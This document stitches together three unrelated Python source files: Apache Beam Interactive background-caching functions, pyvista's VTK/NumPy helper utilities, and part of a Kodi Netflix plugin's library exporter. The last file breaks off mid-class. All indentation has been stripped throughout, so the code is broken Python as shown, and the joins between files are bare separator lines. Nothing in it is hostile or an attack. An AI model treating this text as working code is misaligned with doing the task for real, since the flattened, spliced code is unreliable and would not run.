def attempt_to_run_background_caching_job(runner, user_pipeline, options=None):
"""Attempts to run a background caching job for a user-defined pipeline.
The pipeline result is automatically tracked by Interactive Beam in case
future cancellation/cleanup is needed.
"""
if is_background_caching_job_needed(user_pipeline):
# Cancel non-terminal jobs if there is any before starting a new one.
attempt_to_cancel_background_caching_job(user_pipeline)
# Cancel the gRPC server serving the test stream if there is one.
attempt_to_stop_test_stream_service(user_pipeline)
# TODO(BEAM-8335): refactor background caching job logic from
# pipeline_instrument module to this module and aggregate tests.
from apache_beam.runners.interactive import pipeline_instrument as instr
runner_pipeline = beam.pipeline.Pipeline.from_runner_api(
user_pipeline.to_runner_api(use_fake_coders=True), runner, options)
background_caching_job_result = beam.pipeline.Pipeline.from_runner_api(
instr.build_pipeline_instrument(
runner_pipeline).background_caching_pipeline_proto(),
runner,
options).run()
limiters = ie.current_env().options.capture_control.limiters()
ie.current_env().set_background_caching_job(
user_pipeline,
BackgroundCachingJob(background_caching_job_result, limiters=limiters))
def is_background_caching_job_needed(user_pipeline):
"""Determines if a background caching job needs to be started.
It does several state checks and record state changes throughout the process.
It is not idempotent to simplify the usage.
"""
job = ie.current_env().get_background_caching_job(user_pipeline)
# Checks if the pipeline contains any source that needs to be cached.
need_cache = has_source_to_cache(user_pipeline)
# If this is True, we can invalidate a previous done/running job if there is
# one.
cache_changed = is_source_to_cache_changed(user_pipeline)
# When capture replay is disabled, cache is always needed for capturable
# sources (if any).
if need_cache and not ie.current_env().options.enable_capture_replay:
from apache_beam.runners.interactive.options import capture_control
capture_control.evict_captured_data()
return True
return (
need_cache and
# Checks if it's the first time running a job from the pipeline.
(
not job or
# Or checks if there is no previous job.
# DONE means a previous job has completed successfully and the
# cached events might still be valid.
not (
job.is_done() or
# RUNNING means a previous job has been started and is still
# running.
job.is_running()) or
# Or checks if we can invalidate the previous job.
cache_changed))
def is_cache_complete(pipeline_id):
# type: (str) -> bool
"""Returns True if the backgrond cache for the given pipeline is done.
"""
user_pipeline = ie.current_env().pipeline_id_to_pipeline(pipeline_id)
job = ie.current_env().get_background_caching_job(user_pipeline)
is_done = job and job.is_done()
cache_changed = is_source_to_cache_changed(
user_pipeline, update_cached_source_signature=False)
return is_done and not cache_changed
def has_source_to_cache(user_pipeline):
"""Determines if a user-defined pipeline contains any source that need to be
cached. If so, also immediately wrap current cache manager held by current
interactive environment into a streaming cache if this has not been done.
The wrapping doesn't invalidate existing cache in any way.
This can help determining if a background caching job is needed to write cache
for sources and if a test stream service is needed to serve the cache.
Throughout the check, if source-to-cache has changed from the last check, it
also cleans up the invalidated cache early on.
"""
from apache_beam.runners.interactive import pipeline_instrument as instr
# TODO(BEAM-8335): we temporarily only cache replaceable unbounded sources.
# Add logic for other cacheable sources here when they are available.
has_cache = instr.has_unbounded_sources(user_pipeline)
if has_cache:
if not isinstance(ie.current_env().get_cache_manager(user_pipeline,
create_if_absent=True),
streaming_cache.StreamingCache):
ie.current_env().set_cache_manager(
streaming_cache.StreamingCache(
ie.current_env().get_cache_manager(user_pipeline)._cache_dir,
is_cache_complete=is_cache_complete,
sample_resolution_sec=1.0),
user_pipeline)
return has_cache
def attempt_to_cancel_background_caching_job(user_pipeline):
"""Attempts to cancel background caching job for a user-defined pipeline.
If no background caching job needs to be cancelled, NOOP. Otherwise, cancel
such job.
"""
job = ie.current_env().get_background_caching_job(user_pipeline)
if job:
job.cancel()
def attempt_to_stop_test_stream_service(user_pipeline):
"""Attempts to stop the gRPC server/service serving the test stream.
If there is no such server started, NOOP. Otherwise, stop it.
"""
if is_a_test_stream_service_running(user_pipeline):
ie.current_env().evict_test_stream_service_controller(user_pipeline).stop()
def is_a_test_stream_service_running(user_pipeline):
"""Checks to see if there is a gPRC server/service running that serves the
test stream to any job started from the given user_pipeline.
"""
return ie.current_env().get_test_stream_service_controller(
user_pipeline) is not None
def is_source_to_cache_changed(
user_pipeline, update_cached_source_signature=True):
"""Determines if there is any change in the sources that need to be cached
used by the user-defined pipeline.
Due to the expensiveness of computations and for the simplicity of usage, this
function is not idempotent because Interactive Beam automatically discards
previously tracked signature of transforms and tracks the current signature of
transforms for the user-defined pipeline if there is any change.
When it's True, there is addition/deletion/mutation of source transforms that
requires a new background caching job.
"""
# By default gets empty set if the user_pipeline is first time seen because
# we can treat it as adding transforms.
recorded_signature = ie.current_env().get_cached_source_signature(
user_pipeline)
current_signature = extract_source_to_cache_signature(user_pipeline)
is_changed = not current_signature.issubset(recorded_signature)
# The computation of extract_unbounded_source_signature is expensive, track on
# change by default.
if is_changed and update_cached_source_signature:
options = ie.current_env().options
# No info needed when capture replay is disabled.
if options.enable_capture_replay:
if not recorded_signature:
def sizeof_fmt(num, suffix='B'):
for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1000.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1000.0
return "%.1f%s%s" % (num, 'Yi', suffix)
_LOGGER.info(
'Interactive Beam has detected unbounded sources in your pipeline. '
'In order to have a deterministic replay, a segment of data will '
'be recorded from all sources for %s seconds or until a total of '
'%s have been written to disk.',
options.capture_duration.total_seconds(),
sizeof_fmt(options.capture_size_limit))
else:
_LOGGER.info(
'Interactive Beam has detected a new streaming source was '
'added to the pipeline. In order for the cached streaming '
'data to start at the same time, all captured data has been '
'cleared and a new segment of data will be recorded.')
ie.current_env().cleanup()
ie.current_env().set_cached_source_signature(
user_pipeline, current_signature)
return is_changed
def extract_source_to_cache_signature(user_pipeline):
"""Extracts a set of signature for sources that need to be cached in the
user-defined pipeline.
A signature is a str representation of urn and payload of a source.
"""
from apache_beam.runners.interactive import pipeline_instrument as instr
# TODO(BEAM-8335): we temporarily only cache replaceable unbounded sources.
# Add logic for other cacheable sources here when they are available.
unbounded_sources_as_applied_transforms = instr.unbounded_sources(
user_pipeline)
unbounded_sources_as_ptransforms = set(
map(lambda x: x.transform, unbounded_sources_as_applied_transforms))
_, context = user_pipeline.to_runner_api(
return_context=True, use_fake_coders=True)
signature = set(
map(
lambda transform: str(transform.to_runner_api(context)),
unbounded_sources_as_ptransforms))
return signature
|
helpers.py | """Supporting functions for polydata and grid objects."""
import collections.abc
import ctypes
import enum
import logging
import signal
import warnings
from threading import Thread
import threading
import numpy as np
import scooby
import vtk
import vtk.util.numpy_support as nps
import pyvista
from .fileio import from_meshio
class FieldAssociation(enum.Enum):
"""Represents which type of vtk field a scalar or vector array is associated with."""
POINT = vtk.vtkDataObject.FIELD_ASSOCIATION_POINTS
CELL = vtk.vtkDataObject.FIELD_ASSOCIATION_CELLS
NONE = vtk.vtkDataObject.FIELD_ASSOCIATION_NONE
ROW = vtk.vtkDataObject.FIELD_ASSOCIATION_ROWS
def get_vtk_type(typ):
"""Look up the VTK type for a give python data type.
Corrects for string type mapping issues.
Return
------
int : the integer type id specified in vtkType.h
"""
typ = nps.get_vtk_array_type(typ)
# This handles a silly string type bug
if typ == 3:
return 13
return typ
def vtk_bit_array_to_char(vtkarr_bint):
"""Cast vtk bit array to a char array."""
vtkarr = vtk.vtkCharArray()
vtkarr.DeepCopy(vtkarr_bint)
return vtkarr
def vtk_id_list_to_array(vtk_id_list):
"""Convert a vtkIdList to a NumPy array."""
return np.array([vtk_id_list.GetId(i) for i in range(vtk_id_list.GetNumberOfIds())])
def convert_string_array(arr, name=None):
"""Convert a numpy array of strings to a vtkStringArray or vice versa.
Note that this is terribly inefficient - inefficient support
is better than no support :). If you have ideas on how to make this faster,
please consider opening a pull request.
"""
if isinstance(arr, np.ndarray):
vtkarr = vtk.vtkStringArray()
########### OPTIMIZE ###########
for val in arr:
vtkarr.InsertNextValue(val)
################################
if isinstance(name, str):
vtkarr.SetName(name)
return vtkarr
# Otherwise it is a vtk array and needs to be converted back to numpy
############### OPTIMIZE ###############
nvalues = arr.GetNumberOfValues()
return np.array([arr.GetValue(i) for i in range(nvalues)], dtype='|U')
########################################
def convert_array(arr, name=None, deep=0, array_type=None):
"""Convert a NumPy array to a vtkDataArray or vice versa.
Parameters
-----------
arr : ndarray or vtkDataArry
A numpy array or vtkDataArry to convert
name : str
The name of the data array for VTK
deep : bool
if input is numpy array then deep copy values
Return
------
vtkDataArray, ndarray, or DataFrame:
the converted array (if input is a NumPy ndaray then returns
``vtkDataArray`` or is input is ``vtkDataArray`` then returns NumPy
``ndarray``). If pdf==True and the input is ``vtkDataArry``,
return a pandas DataFrame.
"""
if arr is None:
return
if isinstance(arr, np.ndarray):
if arr.dtype is np.dtype('O'):
arr = arr.astype('|S')
arr = np.ascontiguousarray(arr)
if arr.dtype.type in (np.str_, np.bytes_):
# This handles strings
vtk_data = convert_string_array(arr)
else:
# This will handle numerical data
arr = np.ascontiguousarray(arr)
vtk_data = nps.numpy_to_vtk(num_array=arr, deep=deep, array_type=array_type)
if isinstance(name, str):
vtk_data.SetName(name)
return vtk_data
# Otherwise input must be a vtkDataArray
if not isinstance(arr, (vtk.vtkDataArray, vtk.vtkBitArray, vtk.vtkStringArray)):
raise TypeError('Invalid input array type ({}).'.format(type(arr)))
# Handle booleans
if isinstance(arr, vtk.vtkBitArray):
arr = vtk_bit_array_to_char(arr)
# Handle string arrays
if isinstance(arr, vtk.vtkStringArray):
return convert_string_array(arr)
# Convert from vtkDataArry to NumPy
return nps.vtk_to_numpy(arr)
def is_pyvista_dataset(obj):
"""Return True if the Object is a PyVista wrapped dataset."""
return isinstance(obj, (pyvista.Common, pyvista.MultiBlock))
def point_array(mesh, name):
"""Return point array of a vtk object."""
vtkarr = mesh.GetPointData().GetAbstractArray(name)
return convert_array(vtkarr)
def point_scalar(mesh, name):
"""Return point array of a vtk object.
DEPRECATED: please use `point_array` instead.
"""
warnings.warn("DEPRECATED: please use `point_array` instead.")
return point_array(mesh, name)
def field_array(mesh, name):
"""Return field array of a vtk object."""
vtkarr = mesh.GetFieldData().GetAbstractArray(name)
return convert_array(vtkarr)
def field_scalar(mesh, name):
"""Return field array of a vtk object.
DEPRECATED: please use `field_array` instead.
"""
warnings.warn("DEPRECATED: please use `field_array` instead.")
return field_array(mesh, name)
def cell_array(mesh, name):
"""Return cell array of a vtk object."""
vtkarr = mesh.GetCellData().GetAbstractArray(name)
return convert_array(vtkarr)
def cell_scalar(mesh, name):
"""Return cell array of a vtk object.
DEPRECATED: please use `cell_array` instead.
"""
warnings.warn("DEPRECATED: please use `cell_array` instead.")
return cell_array(mesh, name)
def row_array(data_object, name):
"""Return row array of a vtk object."""
vtkarr = data_object.GetRowData().GetAbstractArray(name)
return convert_array(vtkarr)
def parse_field_choice(field):
"""Return the id of the given field."""
if isinstance(field, str):
field = field.strip().lower()
if field in ['cell', 'c', 'cells']:
field = FieldAssociation.CELL
elif field in ['point', 'p', 'points']:
field = FieldAssociation.POINT
elif field in ['field', 'f', 'fields']:
field = FieldAssociation.NONE
elif field in ['row', 'r',]:
field = FieldAssociation.ROW
else:
raise ValueError('Data field ({}) not supported.'.format(field))
elif isinstance(field, FieldAssociation):
pass
else:
raise ValueError('Data field ({}) not supported.'.format(field))
return field
def get_array(mesh, name, preference='cell', info=False, err=False):
"""Search point, cell and field data for an array.
Parameters
----------
name : str
The name of the array to get the range.
preference : str, optional
When scalars is specified, this is the preferred array type to
search for in the dataset. Must be either ``'point'``,
``'cell'``, or ``'field'``
info : bool
Return info about the array rather than the array itself.
err : bool
Boolean to control whether to throw an error if array is not present.
"""
if isinstance(mesh, vtk.vtkTable):
arr = row_array(mesh, name)
if arr is None and err:
raise KeyError('Data array ({}) not present in this dataset.'.format(name))
field = FieldAssociation.ROW
if info:
return arr, field
return arr
parr = point_array(mesh, name)
carr = cell_array(mesh, name)
farr = field_array(mesh, name)
preference = parse_field_choice(preference)
if np.sum([parr is not None, carr is not None, farr is not None]) > 1:
if preference == FieldAssociation.CELL:
if info:
return carr, FieldAssociation.CELL
else:
return carr
elif preference == FieldAssociation.POINT:
if info:
return parr, FieldAssociation.POINT
else:
return parr
elif preference == FieldAssociation.NONE:
if info:
return farr, FieldAssociation.NONE
else:
return farr
else:
raise ValueError('Data field ({}) not supported.'.format(preference))
arr = None
field = None
if parr is not None:
arr = parr
field = FieldAssociation.POINT
elif carr is not None:
arr = carr
field = FieldAssociation.CELL
elif farr is not None:
arr = farr
field = FieldAssociation.NONE
elif err:
raise KeyError('Data array ({}) not present in this dataset.'.format(name))
if info:
return arr, field
return arr
def vtk_points(points, deep=True):
"""Convert numpy points to a vtkPoints object."""
if not points.flags['C_CONTIGUOUS']:
points = np.ascontiguousarray(points)
vtkpts = vtk.vtkPoints()
vtkpts.SetData(nps.numpy_to_vtk(points, deep=deep))
return vtkpts
def line_segments_from_points(points):
"""Generate non-connected line segments from points.
Assumes points are ordered as line segments and an even number of points
are
Parameters
----------
points : np.ndarray
Points representing line segments. An even number must be given as
every two vertices represent a single line segment. For example, two
line segments would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
Returns
-------
lines : pyvista.PolyData
PolyData with lines and cells.
Examples
--------
This example plots two line segments at right angles to each other line.
>>> import pyvista
>>> import numpy as np
>>> points = np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
>>> lines = pyvista.lines_from_points(points)
>>> lines.plot() # doctest:+SKIP
"""
if len(points) % 2 != 0:
raise ValueError("An even number of points must be given to define each segment.")
# Assuming ordered points, create array defining line order
n_points = len(points)
n_lines = n_points // 2
lines = np.c_[(2 * np.ones(n_lines, np.int_),
np.arange(0, n_points-1, step=2),
np.arange(1, n_points+1, step=2))]
poly = pyvista.PolyData()
poly.points = points
poly.lines = lines
return poly
def lines_from_points(points, close=False):
"""Make a connected line set given an array of points.
Parameters
----------
points : np.ndarray
Points representing the vertices of the connected segments. For
example, two line segments would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0]])
close : bool, optional
If True, close the line segments into a loop
Return
------
lines : pyvista.PolyData
PolyData with lines and cells.
"""
poly = pyvista.PolyData()
poly.points = points
cells = np.full((len(points)-1, 3), 2, dtype=np.int_)
cells[:, 1] = np.arange(0, len(points)-1, dtype=np.int_)
cells[:, 2] = np.arange(1, len(points), dtype=np.int_)
if close:
cells = np.append(cells, [[2, len(points)-1, 0],], axis=0)
poly.lines = cells
return poly
def vector_poly_data(orig, vec):
"""Create a vtkPolyData object composed of vectors."""
# shape, dimension checking
if not isinstance(orig, np.ndarray):
orig = np.asarray(orig)
if not isinstance(vec, np.ndarray):
vec = np.asarray(vec)
if orig.ndim != 2:
orig = orig.reshape((-1, 3))
elif orig.shape[1] != 3:
raise ValueError('orig array must be 3D')
if vec.ndim != 2:
vec = vec.reshape((-1, 3))
elif vec.shape[1] != 3:
raise ValueError('vec array must be 3D')
# Create vtk points and cells objects
vpts = vtk.vtkPoints()
vpts.SetData(nps.numpy_to_vtk(np.ascontiguousarray(orig), deep=True))
npts = orig.shape[0]
cells = np.empty((npts, 2), dtype=pyvista.ID_TYPE)
cells[:, 0] = 1
cells[:, 1] = np.arange(npts, dtype=pyvista.ID_TYPE)
vcells = pyvista.utilities.cells.CellArray(cells, npts)
# Create vtkPolyData object
pdata = vtk.vtkPolyData()
pdata.SetPoints(vpts)
pdata.SetVerts(vcells)
# Add vectors to polydata
name = 'vectors'
vtkfloat = nps.numpy_to_vtk(np.ascontiguousarray(vec), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveVectors(name)
# Add magnitude of vectors to polydata
name = 'mag'
scalars = (vec * vec).sum(1)**0.5
vtkfloat = nps.numpy_to_vtk(np.ascontiguousarray(scalars), deep=True)
vtkfloat.SetName(name)
pdata.GetPointData().AddArray(vtkfloat)
pdata.GetPointData().SetActiveScalars(name)
return pyvista.PolyData(pdata)
def trans_from_matrix(matrix):
"""Convert a vtk matrix to a numpy.ndarray."""
t = np.zeros((4, 4))
for i in range(4):
for j in range(4):
t[i, j] = matrix.GetElement(i, j)
return t
def is_meshio_mesh(mesh):
"""Test if passed object is instance of ``meshio.Mesh``."""
try:
import meshio
return isinstance(mesh, meshio.Mesh)
except ImportError:
return False
def wrap(vtkdataset):
"""Wrap any given VTK data object to its appropriate PyVista data object.
Other formats that are supported include:
* 2D :class:`numpy.ndarray` of XYZ vertices
* 3D :class:`numpy.ndarray` representing a volume. Values will be scalars.
"""
wrappers = {
'vtkUnstructuredGrid': pyvista.UnstructuredGrid,
'vtkRectilinearGrid': pyvista.RectilinearGrid,
'vtkStructuredGrid': pyvista.StructuredGrid,
'vtkPolyData': pyvista.PolyData,
'vtkImageData': pyvista.UniformGrid,
'vtkStructuredPoints': pyvista.UniformGrid,
'vtkMultiBlockDataSet': pyvista.MultiBlock,
'vtkTable': pyvista.Table,
# 'vtkParametricSpline': pyvista.Spline,
}
# Otherwise, we assume a VTK data object was passed
if hasattr(vtkdataset, 'GetClassName'):
key = vtkdataset.GetClassName()
elif vtkdataset is None:
return None
elif isinstance(vtkdataset, np.ndarray):
if vtkdataset.ndim == 1 and vtkdataset.shape[0] == 3:
return pyvista.PolyData(vtkdataset)
if vtkdataset.ndim > 1 and vtkdataset.ndim < 3 and vtkdataset.shape[1] == 3:
return pyvista.PolyData(vtkdataset)
elif vtkdataset.ndim == 3:
mesh = pyvista.UniformGrid(vtkdataset.shape)
mesh['values'] = vtkdataset.ravel(order='F')
mesh.active_scalars_name = 'values'
return mesh
else:
print(vtkdataset.shape, vtkdataset)
raise NotImplementedError('NumPy array could not be converted to PyVista.')
elif is_meshio_mesh(vtkdataset):
return from_meshio(vtkdataset)
else:
raise NotImplementedError('Type ({}) not able to be wrapped into a PyVista mesh.'.format(type(vtkdataset)))
try:
wrapped = wrappers[key](vtkdataset)
except KeyError:
logging.warning('VTK data type ({}) is not currently supported by pyvista.'.format(key))
return vtkdataset # if not supported just passes the VTK data object
return wrapped
def image_to_texture(image):
"""Convert ``vtkImageData`` (:class:`pyvista.UniformGrid`) to a ``vtkTexture``."""
return pyvista.Texture(image)
def numpy_to_texture(image):
"""Convert a NumPy image array to a vtk.vtkTexture."""
if not isinstance(image, np.ndarray):
raise TypeError('Unknown input type ({})'.format(type(image)))
return pyvista.Texture(image)
def is_inside_bounds(point, bounds):
"""Check if a point is inside a set of bounds.
This is implemented through recursion so that this is N-dimensional.
"""
if isinstance(point, (int, float)):
point = [point]
if isinstance(point, (np.ndarray, collections.abc.Sequence)) and not isinstance(point, collections.deque):
if len(bounds) < 2 * len(point) or len(bounds) % 2 != 0:
raise ValueError('Bounds mismatch point dimensionality')
point = collections.deque(point)
bounds = collections.deque(bounds)
return is_inside_bounds(point, bounds)
if not isinstance(point, collections.deque):
raise TypeError('Unknown input data type ({}).'.format(type(point)))
if len(point) < 1:
return True
p = point.popleft()
lower, upper = bounds.popleft(), bounds.popleft()
if lower <= p <= upper:
return is_inside_bounds(point, bounds)
return False
def fit_plane_to_points(points, return_meta=False):
"""Fit a plane to a set of points.
Parameters
----------
points : np.ndarray
Size n by 3 array of points to fit a plane through
return_meta : bool
If true, also returns the center and normal used to generate the plane
"""
data = np.array(points)
center = data.mean(axis=0)
result = np.linalg.svd(data - center)
normal = np.cross(result[2][0], result[2][1])
plane = pyvista.Plane(center=center, direction=normal)
if return_meta:
return plane, center, normal
return plane
def raise_not_matching(scalars, mesh):
"""Raise exception about inconsistencies."""
if isinstance(mesh, vtk.vtkTable):
raise ValueError('Number of scalars ({})'.format(scalars.size) +
'must match number of rows ' +
'({}).'.format(mesh.n_rows) )
raise ValueError('Number of scalars ({}) '.format(scalars.size) +
'must match either the number of points ' +
'({}) '.format(mesh.n_points) +
'or the number of cells ' +
'({}). '.format(mesh.n_cells) )
def generate_plane(normal, origin):
"""Return a vtk.vtkPlane."""
plane = vtk.vtkPlane()
# NORMAL MUST HAVE MAGNITUDE OF 1
normal = normal / np.linalg.norm(normal)
plane.SetNormal(normal)
plane.SetOrigin(origin)
return plane
def generate_report(additional=None, ncol=3, text_width=54, sort=False):
"""Generate a report.
DEPRECATED: Please use :class:`pyvista.Report` instead.
"""
logging.warning('DEPRECATED: Please use `pyvista.Report` instead.')
core = ['pyvista', 'vtk', 'numpy', 'imageio', 'appdirs', 'scooby']
optional = ['matplotlib', 'PyQt5', 'IPython', 'colorcet',
'cmocean']
report = scooby.Report(core=core, optional=optional,
additional=additional, ncol=ncol,
text_width=text_width, sort=sort)
return report
def try_callback(func, *args):
"""Wrap a given callback in a try statement."""
try:
func(*args)
except Exception as e:
logging.warning('Encountered issue in callback: {}'.format(e))
return
def check_depth_peeling(number_of_peels=100, occlusion_ratio=0.0):
"""Check if depth peeling is available.
Attempts to use depth peeling to see if it is available for the current
environment. Returns ``True`` if depth peeling is available and has been
successfully leveraged, otherwise ``False``.
"""
# Try Depth Peeling with a basic scene
source = vtk.vtkSphereSource()
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
# requires opacity < 1
actor.GetProperty().SetOpacity(0.5)
renderer = vtk.vtkRenderer()
renderWindow = vtk.vtkRenderWindow()
renderWindow.AddRenderer(renderer)
renderWindow.SetOffScreenRendering(True)
renderWindow.SetAlphaBitPlanes(True)
renderWindow.SetMultiSamples(0)
renderer.AddActor(actor)
renderer.SetUseDepthPeeling(True)
renderer.SetMaximumNumberOfPeels(number_of_peels)
renderer.SetOcclusionRatio(occlusion_ratio)
renderWindow.Render()
return renderer.GetLastRenderingUsedDepthPeeling() == 1
def threaded(fn):
"""Call a function using a thread."""
def wrapper(*args, **kwargs):
thread = Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
class conditional_decorator:
"""Conditional decorator for methods."""
def __init__(self, dec, condition):
"""Initialize."""
self.decorator = dec
self.condition = condition
def __call__(self, func):
"""Call the decorated function if condition is matched."""
if not self.condition:
# Return the function unchanged, not decorated.
return func
return self.decorator(func)
class ProgressMonitor():
"""A standard class for monitoring the progress of a VTK algorithm.
This must be use in a ``with`` context and it will block keyboard
interrupts from happening until the exit event as interrupts will crash
the kernel if the VTK algorithm is still executing.
"""
def __init__(self, algorithm, message="", scaling=100):
"""Initialize observer."""
try:
from tqdm import tqdm
except ImportError:
raise ImportError("Please install `tqdm` to monitor algorithms.")
self.event_type = vtk.vtkCommand.ProgressEvent
self.progress = 0.0
self._last_progress = self.progress
self.algorithm = algorithm
self.message = message
self._interrupt_signal_received = False
self._old_progress = 0
self._old_handler = None
self._progress_bar = None
def handler(self, sig, frame):
"""Pass signal to custom interrupt handler."""
self._interrupt_signal_received = (sig, frame)
logging.debug('SIGINT received. Delaying KeyboardInterrupt until '
'VTK algorithm finishes.')
def __call__(self, obj, event, *args):
"""Call progress update callback.
On an event occurrence, this function executes.
"""
if self._interrupt_signal_received:
obj.AbortExecuteOn()
else:
progress = obj.GetProgress()
step = progress - self._old_progress
self._progress_bar.update(step)
self._old_progress = progress
def __enter__(self):
"""Enter event for ``with`` context."""
from tqdm import tqdm
# check if in main thread
if threading.current_thread().__class__.__name__ == '_MainThread':
self._old_handler = signal.signal(signal.SIGINT, self.handler)
self._progress_bar = tqdm(total=1, leave=True,
bar_format='{l_bar}{bar}[{elapsed}<{remaining}]')
self._progress_bar.set_description(self.message)
self.algorithm.AddObserver(self.event_type, self)
return self._progress_bar
def __exit__(self, type, value, traceback):
"""Exit event for ``with`` context."""
self._progress_bar.total = 1
self._progress_bar.refresh()
self._progress_bar.close()
self.algorithm.RemoveObservers(self.event_type)
if threading.current_thread().__class__.__name__ == '_MainThread':
signal.signal(signal.SIGINT, self._old_handler)
def abstract_class(cls_):
"""Decorate a class, overriding __new__.
Preventing a class from being instantiated similar to abc.ABCMeta
but does not require an abstract method.
"""
def __new__(cls, *args, **kwargs):
if cls is cls_:
raise TypeError('{} is an abstract class and may not be instantiated.'
.format(cls.__name__))
return object.__new__(cls)
cls_.__new__ = __new__
return cls_
|
Library.py | # pylint: skip-file
# -*- coding: utf-8 -*-
# Module: LibraryExporter
# Created on: 13.01.2017
import os
import re
import time
import threading
import xbmc
import xbmcgui
import xbmcvfs
import requests
from utils import noop
from KodiHelper import KodiHelper
try:
import cPickle as pickle
except:
import pickle
class Library(object):
"""Exports Netflix shows & movies to a local library folder"""
series_label = 'shows'
"""str: Label to identify shows"""
movies_label = 'movies'
"""str: Label to identify movies"""
metadata_label = 'metadata'
"""str: Label to identify metadata"""
imagecache_label = 'imagecache'
"""str: Label to identify imagecache"""
db_filename = 'lib.ndb'
"""str: (File)Name of the store for the database dump that contains
all shows/movies added to the library"""
def __init__(self, nx_common):
"""
Takes the instances & configuration options needed to drive the plugin
Parameters
----------
root_folder : :obj:`str`
Cookie location
library_settings : :obj:`str`
User data cache location
library_db_path : :obj:`str`
User data cache location
log_fn : :obj:`fn`
optional log function
"""
enable_custom_folder = nx_common.get_setting('enablelibraryfolder')
self.nx_common = nx_common
self.kodi_helper = None
self.base_data_path = nx_common.data_path
self.enable_custom_library_folder = enable_custom_folder
self.custom_library_folder = nx_common.get_setting('customlibraryfolder')
self.db_filepath = os.path.join(self.base_data_path, self.db_filename)
self.log = nx_common.log
# check for local library folder & set up the paths
if self.enable_custom_library_folder != 'true':
lib_path = self.base_data_path
else:
lib_path = self.custom_library_folder
self.movie_path = os.path.join(lib_path, self.movies_label)
self.tvshow_path = os.path.join(lib_path, self.series_label)
self.metadata_path = os.path.join(lib_path, self.metadata_label)
self.imagecache_path = os.path.join(lib_path, self.imagecache_label)
# check if we need to setup the base folder structure & do so if needed
self.setup_local_netflix_library(source={
self.movies_label: self.movie_path,
self.series_label: self.tvshow_path,
self.metadata_label: self.metadata_path,
self.imagecache_label: self.imagecache_path
})
# load the local db
self.db = self._load_local_db(filename=self.db_filepath)
def set_kodi_helper(self, kodi_helper):
self.kodi_helper = kodi_helper
def setup_local_netflix_library(self, source):
"""Sets up the basic directories
Parameters
----------
source : :obj:`dict` of :obj:`str`
Dicitionary with directories to be created
"""
for label in source:
exists = xbmcvfs.exists(
path=self.nx_common.check_folder_path(source[label]))
if not exists:
xbmcvfs.mkdir(source[label])
def write_strm_file(self, path, url, title_player):
"""Writes the stream file that Kodi can use to integrate it into the DB
Parameters
----------
path : :obj:`str`
Filepath of the file to be created
url : :obj:`str`
Stream url
title_player : :obj:`str`
Video fallback title for m3u
"""
if isinstance(path, str):
logpath = path.decode('ascii', 'ignore').encode('ascii')
elif isinstance(path, unicode):
logpath = path.encode('ascii', 'ignore')
self.log('Writing {}'.format(logpath))
f = xbmcvfs.File(path, 'w')
f.write('#EXTINF:-1,'+title_player.encode('utf-8')+'\n')
f.write(url)
f.close()
self.log('Successfully wrote {}'.format(logpath))
def write_metadata_file(self, video_id, content):
"""Writes the metadata file that caches grabbed content from netflix
Parameters
----------
video_id : :obj:`str`
ID of video
content :
Unchanged metadata from netflix
"""
meta_file = os.path.join(self.metadata_path, video_id+'.meta')
if not xbmcvfs.exists(meta_file):
f = xbmcvfs.File(meta_file, 'wb')
pickle.dump(content, f)
f.close()
def read_metadata_file(self, video_id):
"""Reads the metadata file that caches grabbed content from netflix
Parameters
----------
video_id : :obj:`str`
ID of video
content :
Unchanged metadata from cache file
"""
meta_file = os.path.join(self.metadata_path, str(video_id)+'.meta')
if xbmcvfs.exists(meta_file):
f = xbmcvfs.File(meta_file, 'rb')
content = f.read()
f.close()
meta_data = pickle.loads(content)
return meta_data
return
def read_artdata_file(self, video_id):
"""Reads the artdata file that caches grabbed content from netflix
Parameters
----------
video_id : :obj:`str`
ID of video
content :
Unchanged artdata from cache file
"""
meta_file = os.path.join(self.metadata_path, str(video_id)+'.art')
if xbmcvfs.exists(meta_file):
f = xbmcvfs.File(meta_file, 'rb')
content = f.read()
f.close()
meta_data = pickle.loads(content)
return meta_data
return
def write_artdata_file(self, video_id, content):
"""Writes the art data file that caches grabbed content from netflix
Parameters
----------
video_id : :obj:`str`
ID of video
content :
Unchanged artdata from netflix
"""
meta_file = os.path.join(self.metadata_path, video_id+'.art')
if not xbmcvfs.exists(meta_file):
f = xbmcvfs.File(meta_file, 'wb')
pickle.dump(content, f)
f.close()
def _load_local_db(self, filename):
"""Loads the local db file and parses it, creates one if not existent
Parameters
----------
filename : :obj:`str`
Filepath of db file
Returns
-------
:obj:`dict`
Parsed contents of the db file
"""
# if the db doesn't exist, create it
if not os.path.isfile(filename):
data = {self.movies_label: {}, self.series_label: {}}
self.log('Setup local library DB')
self._update_local_db(filename=filename, db=data)
return data
with open(filename) as f:
data = pickle.load(f)
if data:
return data
else:
return {}
def _update_local_db(self, filename, db):
"""Updates the local db file with new data
Parameters
----------
filename : :obj:`str`
Filepath of db file
db : :obj:`dict`
Database contents
Returns
-------
bool
Update has been successfully executed
"""
if not os.path.isdir(os.path.dirname(filename)):
return False
with open(filename, 'w') as f:
f.truncate()
pickle.dump(db, f)
return True
def movie_exists(self, title, year):
"""Checks if a movie is already present in the local DB
Parameters
----------
title : :obj:`str`
Title of the movie
year : :obj:`int`
Release year of the movie
Returns
-------
bool
Movie exists in DB
"""
title = re.sub(r'[?|$|!|:|#]', r'', title)
movie_meta = '%s (%d)' % (title, year)
return movie_meta in self.db[self.movies_label]
def show_exists(self, title):
"""Checks if a show is present in the local DB
Parameters
----------
title : :obj:`str`
Title of the show
Returns
-------
bool
Show exists in DB
"""
title = re.sub(r'[?|$|!|:|#]', r'', title)
show_meta = '%s' % (title)
return show_meta in self.db[self.series_label]
def season_exists(self, title, season):
"""Checks if a season is present in the local DB
Parameters
----------
title : :obj:`str`
Title of the show
season : :obj:`int`
Season sequence number
Returns
-------
bool
Season of show exists in DB
"""
title = re.sub(r'[?|$|!|:|#]', r'', title)
if self.show_exists(title) is False:
return False
show_entry = self.db[self.series_label][title]
return season in show_entry['seasons']
